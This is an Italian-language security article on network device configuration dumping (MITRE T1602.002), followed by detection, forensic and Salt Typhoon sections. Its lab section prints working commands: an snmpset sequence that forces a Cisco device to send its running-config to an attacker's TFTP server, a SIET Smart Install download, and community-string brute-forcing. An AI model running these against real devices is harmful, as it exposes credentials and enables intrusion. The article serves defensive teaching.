Dump delle Configurazioni di Rete: Network Device Configuration Dump (T1602.002)

Il modo più immediato per testare questa superficie d'attacco è partire da SNMP. In laboratorio, configura un router con SNMPv2c e una community string debole (ad esempio public o private), poi lancia un'enumerazione con Net-SNMP (open source), il toolkit standard presente in quasi tutte le distribuzioni Linux:

snmpwalk -v2c -c public <IP_TARGET> 1.3.6.1.4.1.9.9.43.1.1

L'OID 1.3.6.1.4.1.9.9.43 corrisponde al ramo Cisco Configuration Management MIB. Se la community ha permessi di lettura/scrittura, puoi fare molto di più: forzare il dispositivo a esportare la configurazione via TFTP verso una macchina sotto il tuo controllo. L'operazione si esegue impostando una serie di OID via snmpset:

snmpset -v2c -c private <IP_TARGET> 1.3.6.1.4.1.9.9.96.1.1.1.1.2.<RANDOM_INDEX> i 1 1.3.6.1.4.1.9.9.96.1.1.1.1.3.<RANDOM_INDEX> i 4 1.3.6.1.4.1.9.9.96.1.1.1.1.4.<RANDOM_INDEX> i 1 1.3.6.1.4.1.9.9.96.1.1.1.1.5.<RANDOM_INDEX> a <IP_TFTP_SERVER> 1.3.6.1.4.1.9.9.96.1.1.1.1.6.<RANDOM_INDEX> s running-config 1.3.6.1.4.1.9.9.96.1.1.1.1.14.<RANDOM_INDEX> i 1

Questo comando istruisce il dispositivo Cisco a copiare la running-config sul tuo server TFTP. Avvia prima il listener con atftpd o tftpd-hpa (entrambi open source) sulla macchina ricevente.

Per il vettore Smart Install, lo strumento di riferimento è SIET — Smart Install Exploitation Tool (open source, disponibile su GitHub). Permette di identificare dispositivi con SMI attivo e di scaricare la configurazione:

python siet.py -g -i <IP_TARGET>

Il flag -g avvia il download della configurazione. Prima di procedere, verifica che il target esponga la porta TCP 4786 con un semplice scan Nmap:

nmap -p 4786 --script banner <IP_TARGET>

Nmap (open source) dispone anche di script NSE utili per l'enumerazione SNMP, come snmp-brute per il brute-force delle community string e snmp-interfaces per mappare le interfacce. Una catena d'attacco realistica in lab prevede tre fasi: enumerazione delle community con onesixtyone (open source), dump della configurazione via SNMP, analisi offline delle credenziali estratte con un editor di testo o con grep per individuare le righe contenenti password, secret o key.

La detection su questa tecnica si gioca quasi interamente sul traffico di rete e sui log dei dispositivi stessi, perché gli endpoint tradizionali non vedono nulla. Le log source critiche sono: syslog dei network device, log di accesso SNMP, flussi NetFlow/IPFIX e gli alert degli IDS/IPS di rete.

Il primo alert da costruire riguarda le query SNMP verso OID sensibili. I rami MIB relativi alla configurazione — in particolare 1.3.6.1.4.1.9.9.96 (Cisco Config Copy MIB) e 1.3.6.1.4.1.9.9.43 (Cisco Config Man MIB) — non dovrebbero mai essere interrogati da IP diversi dalle stazioni di gestione autorizzate. Il parametro di tuning AuthorizedAdminIPs è fondamentale: costruisci una whitelist rigorosa degli indirizzi IP delle piattaforme NMS e verifica settimanalmente che sia aggiornata. Ogni query SNMP proveniente da un IP non in lista merita un alert ad alta priorità.

Il secondo indicatore è il traffico Smart Install sulla porta TCP 4786. Se l'organizzazione non utilizza SMI — e nella maggior parte dei casi non dovrebbe — qualsiasi connessione su quella porta è anomala per definizione. Configura una regola IDS/IPS, ad esempio su Suricata (open source) o Snort (open source), per rilevare e bloccare il traffico SMI da sorgenti non autorizzate.

Per la componente CLI, i dispositivi generano log syslog ogni volta che un operatore esegue comandi come show running-config o copy running-config. Inoltra questi log al SIEM e crea una correlazione: se un comando di dump della configurazione è preceduto da un'autenticazione da un IP insolito o fuori dalla finestra di manutenzione (TimeWindow), l'evento merita escalation.

Il terzo pilastro è il monitoraggio dei trasferimenti di file in uscita dal dispositivo. Un dump via TFTP, SCP o FTP genera flussi di rete riconoscibili. Un alert efficace correla il protocollo di trasferimento con il parametro AllowedTransferProtocols: se la policy aziendale prevede solo SCP e il dispositivo avvia un trasferimento TFTP, è un segnale forte. Il tasso di esportazione — NormalConfigExportRate — completa il quadro: più di un export al giorno, fuori dal ciclo di backup pianificato, indica un'anomalia.

I falsi positivi principali derivano dalle attività di backup automatico (RANCID, Oxidized) e dagli script di automazione legittimi. Documentali nella baseline e escludili per IP e per orario.

L'analisi forense su un dump di configurazione di rete richiede un approccio diverso rispetto all'endpoint tradizionale: gli artefatti principali risiedono nel dispositivo stesso, nei log centralizzati e nel traffico di rete catturato.

Il punto di partenza è il syslog del dispositivo. I router e gli switch Cisco, ad esempio, registrano ogni accesso CLI e ogni comando eseguito se il logging è configurato correttamente (con archive log config e login on-failure log). Cerca le entry che contengono stringhe come CONFIG_I, SYS-5-CONFIG_I o COPY — indicano che la configurazione è stata visualizzata, modificata o copiata. Annota l'IP sorgente, il timestamp e l'utente associato per costruire il primo nodo della timeline.

Se il dump è avvenuto via SNMP, l'artefatto chiave è il log di accesso SNMP, quando abilitato. I dispositivi possono registrare le richieste SNMP ricevute, inclusi gli OID interrogati. La presenza di query massive verso l'intero ramo 1.3.6.1.4.1.9.9.96 da un indirizzo non riconosciuto è un indicatore forte. In assenza di log SNMP sul dispositivo, il traffico catturato da un NSM (Network Security Monitor) come Zeek (open source) diventa la fonte primaria: Zeek genera log specifici per SNMP che includono community string, OID richiesti e versione del protocollo.

Per il vettore Smart Install, cerca nei log di rete connessioni in ingresso sulla porta TCP 4786 seguite da trasferimenti TFTP in uscita. La sequenza temporale è caratteristica: connessione SMI → pausa breve → trasferimento TFTP verso un IP esterno o anomalo. I file PCAP catturati da un sensore di rete permettono di ricostruire il contenuto esatto del trasferimento con Wireshark (open source), filtrando per tftp e seguendo lo stream.

Sul piano dei file, verifica il server TFTP/SCP/FTP aziendale alla ricerca di configurazioni salvate in orari inconsueti o con naming convention anomale. Se l'avversario ha usato un server esterno, il dato sarà visibile solo nei flussi NetFlow come connessione in uscita verso una destinazione non censita.

La correlazione con il caso Salt Typhoon è diretta: questo gruppo ha utilizzato il dump delle configurazioni per estrarre credenziali dai dispositivi di rete. Nella timeline, la fase di dump della configurazione è tipicamente preceduta da un accesso iniziale al device (credential stuffing, exploit di vulnerabilità note) e seguita dall'uso delle credenziali estratte per il movimento laterale verso altri segmenti di rete.

Il panorama degli attori che sfruttano il dump delle configurazioni di rete è dominato da un gruppo di alto profilo legato a operazioni di spionaggio su infrastrutture critiche.

Salt Typhoon (G1045) rappresenta il caso più rilevante associato a questa tecnica. Il gruppo ha tentato di acquisire credenziali estraendo le configurazioni dai dispositivi di rete, un approccio coerente con un modus operandi orientato alla persistenza a lungo termine nelle infrastrutture di telecomunicazione. Il dump della configurazione non è fine a sé stesso: le credenziali ottenute — community string SNMP, password enable, chiavi VPN — vengono riutilizzate per espandere l'accesso verso altri dispositivi della stessa rete o verso segmenti adiacenti. Il profilo di Salt Typhoon suggerisce un interesse primario verso operatori telco e ISP, dove i dispositivi di rete sono il tessuto connettivo dell'intera infrastruttura e una singola configurazione può svelare centinaia di rotte, peering BGP e interconnessioni con altri provider.

Dal punto di vista dei pattern operativi, la tecnica T1602.002 si colloca quasi sempre nella fase intermedia della kill chain: l'attore ha già ottenuto un primo accesso al piano di gestione del dispositivo e utilizza il dump come trampolino per la fase successiva. Il vettore SNMP è preferito quando le community string sono deboli o di default — una condizione ancora comune nelle reti enterprise di grandi dimensioni — mentre Smart Install viene sfruttato su infrastrutture Cisco dove il protocollo non è stato disabilitato.

Per il threat modeling, un'organizzazione che gestisce infrastrutture di telecomunicazione o che opera come ISP dovrebbe considerare il dump delle configurazioni come un indicatore di attività pre-esfiltrazione. La presenza di accessi anomali ai dispositivi di rete, combinata con trasferimenti di file non pianificati, deve attivare un flusso di threat hunting dedicato. Il consiglio operativo è verificare periodicamente che tutti i dispositivi di rete abbiano community SNMP non di default, SMI disabilitato e che il piano di gestione sia raggiungibile solo da una rete dedicata e segmentata, riducendo drasticamente la superficie d'attacco disponibile per gruppi con il profilo di Salt Typhoon.

Framework MITRE ATT&CK v16 — Tecnica T1602.002 (Network Device Configuration Dump), Tattica TA0009 (Collection), Gruppo G1045 (Salt Typhoon), Mitigazioni M1041, M1030, M1031, M1054, M1037, M1051, Detection DET0233/AN0647. Tool di detection e offensive: Net-SNMP, Nmap, SIET, onesixtyone, Zeek, Suricata, Snort, Wireshark. Integrato con conoscenza professionale per tool e procedure operative.